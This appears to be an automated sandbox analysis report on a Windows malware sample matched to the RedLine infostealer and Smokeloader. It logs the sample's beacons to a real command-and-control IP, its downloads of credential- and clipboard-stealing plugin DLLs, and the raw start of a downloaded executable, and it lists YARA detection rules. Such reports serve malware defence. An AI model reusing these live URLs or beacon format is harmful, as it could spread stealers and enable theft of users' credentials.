                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 16:37:24 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                            Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll7
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllE
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php1FJe
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php2p
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php342a2
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php:dA
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpPe
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpY&e
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpdW
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpe5342a2
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpq
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Golol478Ns/index.php
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01377F00 CreateMutexW,GetLastError,SetCurrentDirectoryA,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,8_2_01377F00
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 16:37:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1

                            System Summary

                            barindex
                            Source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E3BA20_2_010E3BA2
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E5C9E0_2_010E5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A73BA21_2_00A73BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A75C9E1_2_00A75C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00408C602_2_00408C60
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040DC112_2_0040DC11
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00407C3F2_2_00407C3F
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00418CCC2_2_00418CCC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00406CA02_2_00406CA0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004028B02_2_004028B0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004182442_2_00418244
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004016502_2_00401650
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00402F202_2_00402F20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004193C42_2_004193C4
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004187882_2_00418788
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00402F892_2_00402F89
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00402B902_2_00402B90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004073A02_2_004073A0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050786D2_2_0050786D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005018B72_2_005018B7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005031F02_2_005031F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005189EF2_2_005189EF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005031872_2_00503187
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00502B172_2_00502B17
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005184AB2_2_005184AB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00502DF72_2_00502DF7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050DE782_2_0050DE78
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00508EC72_2_00508EC7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00507EA62_2_00507EA6
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00506F072_2_00506F07
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00518F332_2_00518F33
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051A7252_2_0051A725
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_005077D92_2_005077D9
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F0DB02_2_022F0DB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_013985308_2_01398530
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0139754D8_2_0139754D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01376F408_2_01376F40
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.3.aTaf.exe.540000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.aTaf.exe.500e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010E1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A71F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: String function: 0040E1D8 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: String function: 0050E43F appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01387CE0 appears 40 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01385E20 appears 130 times
